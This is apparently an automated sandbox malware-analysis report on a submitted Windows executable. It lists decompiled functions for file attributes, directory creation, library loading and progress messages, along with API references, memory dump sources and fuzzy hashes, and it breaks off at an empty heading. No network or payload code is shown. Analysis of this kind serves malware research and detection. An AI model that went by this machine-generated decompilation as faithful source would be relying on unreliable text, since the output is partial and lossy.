                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1892508949-0
                                                                                                                              • Opcode ID: be34f831566008b24982441b18b2d2c73a052184d4bf83d6b95b892da155639b
                                                                                                                              • Instruction ID: b26d59bbbb8bd31aa62bfaa3988508fb5429084e49f4d8f394da2dab55023cb6
                                                                                                                              • Opcode Fuzzy Hash: be34f831566008b24982441b18b2d2c73a052184d4bf83d6b95b892da155639b
                                                                                                                              • Instruction Fuzzy Hash: E611E631504115EBCF216FA5CD40A9F36A0EF15369B28493BF541B52F1DA3E4A819F4D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 69%
                                                                                                                              			E00401389(signed int _a4, struct HWND__* _a10) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x7a8a90;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a10 != 0) {
						 *0x7a7a4c =  *0x7a7a4c + _t12;
						SendMessageW(_a10, 0x402, MulDiv( *0x7a7a4c, 0x7530,  *0x7a7a34), 0); // executed
					}
				}
				return 0;
			}










                                                                                                                              0x0040138a
                                                                                                                              0x004013fa
                                                                                                                              0x0040139b
                                                                                                                              0x004013a0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004013a2
                                                                                                                              0x004013a3
                                                                                                                              0x004013ad
                                                                                                                              0x00000000
                                                                                                                              0x00401404
                                                                                                                              0x004013b0
                                                                                                                              0x004013b7
                                                                                                                              0x004013bd
                                                                                                                              0x004013be
                                                                                                                              0x004013c0
                                                                                                                              0x004013c2
                                                                                                                              0x004013b9
                                                                                                                              0x004013b9
                                                                                                                              0x004013ba
                                                                                                                              0x004013ba
                                                                                                                              0x004013c9
                                                                                                                              0x004013cb
                                                                                                                              0x004013f4
                                                                                                                              0x004013f4
                                                                                                                              0x004013c9
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                              • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3850602802-0
                                                                                                                              • Opcode ID: 0f992e2ae6cf3b1b8dd96a4b6b0adf3515dff43e38b3359cc4322e8ed16e10f0
                                                                                                                              • Instruction ID: 637f0bbede897030ab690e2e99e2181d797c58f7d0d2aab6e1f53bdf2be6ce4b
                                                                                                                              • Opcode Fuzzy Hash: 0f992e2ae6cf3b1b8dd96a4b6b0adf3515dff43e38b3359cc4322e8ed16e10f0
                                                                                                                              • Instruction Fuzzy Hash: 9501F432624220ABE7195B389D05B2A3698E751314F10C13FF955F69F1EA78CC02DB4D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$EnableShow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1136574915-0
                                                                                                                              • Opcode ID: 393b5c21bb7cc3de8bedbfe4bad105ee39a9eabd1884b7fb5bcfa8057cf0f7ce
                                                                                                                              • Instruction ID: 6c41119d880c6e907524726e204bf21ac727531236896e2a35a455d3971ed6d0
                                                                                                                              • Opcode Fuzzy Hash: 393b5c21bb7cc3de8bedbfe4bad105ee39a9eabd1884b7fb5bcfa8057cf0f7ce
                                                                                                                              • Instruction Fuzzy Hash: 62E01272908211CFE705EBA4EE495AE77B4EB40315710497FE501F11D1DBB94D00865D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004068E7 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E004068E7(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E00406877(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                                                              0x004068ef
                                                                                                                              0x004068f2
                                                                                                                              0x004068f9
                                                                                                                              0x00406901
                                                                                                                              0x0040690d
                                                                                                                              0x00000000
                                                                                                                              0x00406914
                                                                                                                              0x00406904
                                                                                                                              0x0040690b
                                                                                                                              0x00000000
                                                                                                                              0x0040691c
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,0040361A,0000000B), ref: 004068F9
                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406914
                                                                                                                                • Part of subcall function 00406877: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040688E
                                                                                                                                • Part of subcall function 00406877: wsprintfW.USER32 ref: 004068C9
                                                                                                                                • Part of subcall function 00406877: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068DD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2547128583-0
                                                                                                                              • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                              • Instruction ID: 6423a29397ed7bff7b22ace80297d9bc35d616ea5f013efbaa2f78a15a639a79
                                                                                                                              • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                              • Instruction Fuzzy Hash: CEE08673504210AAE21196716E44C7773A89F89740316443FF946F2080D738DC359AAD
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040600A Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 68%
                                                                                                                              			E0040600A(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                                                              0x0040600e
                                                                                                                              0x0040601b
                                                                                                                              0x00406030
                                                                                                                              0x00406036

                                                                                                                              APIs
                                                                                                                              • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\aSsc9zh1ex.exe,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040385A,?), ref: 00406030
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 415043291-0
                                                                                                                              • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                              • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                                                              • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                              • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405FE5 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00405FE5(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                                                                                              0x00405fea
                                                                                                                              0x00405ff0
                                                                                                                              0x00405ff5
                                                                                                                              0x00405ffe
                                                                                                                              0x00405ffe
                                                                                                                              0x00406007

                                                                                                                              APIs
                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00405BEA,?,?,00000000,00405DC0,?,?,?,?), ref: 00405FEA
                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FFE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AttributesFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3188754299-0
                                                                                                                              • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                              • Instruction ID: e4d3e829c0d5e7da9196b8d45c2199d6a51b20c6ab53065100e3d1aec4738abc
                                                                                                                              • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                              • Instruction Fuzzy Hash: 4CD01272504130BFC2102728EF0C89BBF95EF64375B024B35FAA5A22F0CB304C638A98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405AC8 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00405AC8(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                                                              0x00405ace
                                                                                                                              0x00405ad6
                                                                                                                              0x00000000
                                                                                                                              0x00405adc
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,004034FD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405ACE
                                                                                                                              • GetLastError.KERNEL32 ref: 00405ADC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1375471231-0
                                                                                                                              • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                              • Instruction ID: 96bb703f3db892353912e36940962cdd7e9d34b0f70b6f3c067145efd4a10b7e
                                                                                                                              • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                              • Instruction Fuzzy Hash: 95C04C30344601AEDA105B219E48B1B7AD4DB50741F26853D6146F41A0EA788455DD3D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 6F002B98 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 28%
                                                                                                                              			E6F002B98(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				int _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x6f005050 != 0 && E6F002ADB(_a4) == 0) {
					 *0x6f005054 = _t93;
					if( *0x6f00504c != 0) {
						_t93 =  *0x6f00504c;
					} else {
						E6F0030C0(E6F002AD5(), __ecx);
						 *0x6f00504c = _t93;
					}
				}
				_t28 = E6F002B09(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E6F002AFD();
					_t72 = _a4;
					_t79 =  *0x6f005058;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x6f005058 = _t72;
					E6F002AF7();
					_t33 = ReadFile(??, ??, ??, ??, ??); // executed
					 *0x6f005034 = _t33;
					 *0x6f005038 = _t79;
					if( *0x6f005050 != 0 && E6F002ADB( *0x6f005058) == 0) {
						 *0x6f00504c = _t94;
						_t94 =  *0x6f005054;
					}
					_t80 =  *0x6f005058;
					_a4 = _t80;
					 *0x6f005058 =  *((intOrPtr*)(E6F002AFD() + _t80));
					_t37 = E6F002AE9(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E6F002B09(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E6F002B14() + _a4 + _v8);
							_push(E6F002B1E());
							if( *0x6f005050 <= 0 || E6F002ADB(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x6f00504c =  *0x6f00504c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x6f005058;
					if( *0x6f005058 == 0) {
						 *0x6f00504c = 0;
					}
					E6F002B42(_t107, _a4,  *0x6f005034,  *0x6f005038);
					return _a4;
				}
				_push(E6F002B14() + _a4);
				_t56 = E6F002B1A();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E6F002B26();
				_t87 = E6F002B22();
				_t90 = E6F002B1E();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

























                                                                                                                              0x6f002ba8
                                                                                                                              0x6f002bb9
                                                                                                                              0x6f002bc6
                                                                                                                              0x6f002bda
                                                                                                                              0x6f002bc8
                                                                                                                              0x6f002bcd
                                                                                                                              0x6f002bd2
                                                                                                                              0x6f002bd2
                                                                                                                              0x6f002bc6
                                                                                                                              0x6f002be3
                                                                                                                              0x6f002be8
                                                                                                                              0x6f002bee
                                                                                                                              0x6f002c32
                                                                                                                              0x6f002c32
                                                                                                                              0x6f002c37
                                                                                                                              0x6f002c3c
                                                                                                                              0x6f002c42
                                                                                                                              0x6f002c44
                                                                                                                              0x6f002c4a
                                                                                                                              0x6f002c57
                                                                                                                              0x6f002c59
                                                                                                                              0x6f002c5e
                                                                                                                              0x6f002c6b
                                                                                                                              0x6f002c7e
                                                                                                                              0x6f002c84
                                                                                                                              0x6f002c8a
                                                                                                                              0x6f002c8b
                                                                                                                              0x6f002c91
                                                                                                                              0x6f002c9d
                                                                                                                              0x6f002ca3
                                                                                                                              0x6f002cab
                                                                                                                              0x6f002cac
                                                                                                                              0x6f002caf
                                                                                                                              0x6f002cba
                                                                                                                              0x6f002cbc
                                                                                                                              0x6f002cc8
                                                                                                                              0x6f002cce
                                                                                                                              0x6f002cd6
                                                                                                                              0x6f002d02
                                                                                                                              0x6f002d03
                                                                                                                              0x6f002d05
                                                                                                                              0x6f002d09
                                                                                                                              0x6f002d09
                                                                                                                              0x6f002d10
                                                                                                                              0x6f002ce6
                                                                                                                              0x6f002ce6
                                                                                                                              0x6f002ce7
                                                                                                                              0x6f002cf5
                                                                                                                              0x6f002cfe
                                                                                                                              0x6f002cfe
                                                                                                                              0x6f002cd6
                                                                                                                              0x6f002cba
                                                                                                                              0x6f002d12
                                                                                                                              0x6f002d19
                                                                                                                              0x6f002d1b
                                                                                                                              0x6f002d1b
                                                                                                                              0x6f002d34
                                                                                                                              0x6f002d42
                                                                                                                              0x6f002d42
                                                                                                                              0x6f002bf9
                                                                                                                              0x6f002bfa
                                                                                                                              0x6f002bff
                                                                                                                              0x6f002c03
                                                                                                                              0x6f002c08
                                                                                                                              0x6f002c1c
                                                                                                                              0x6f002c1d
                                                                                                                              0x6f002c1e
                                                                                                                              0x6f002c20
                                                                                                                              0x6f002c25
                                                                                                                              0x6f002c27
                                                                                                                              0x6f002c27
                                                                                                                              0x6f002c2a
                                                                                                                              0x6f002c30
                                                                                                                              0x00000000

                                                                                                                              APIs
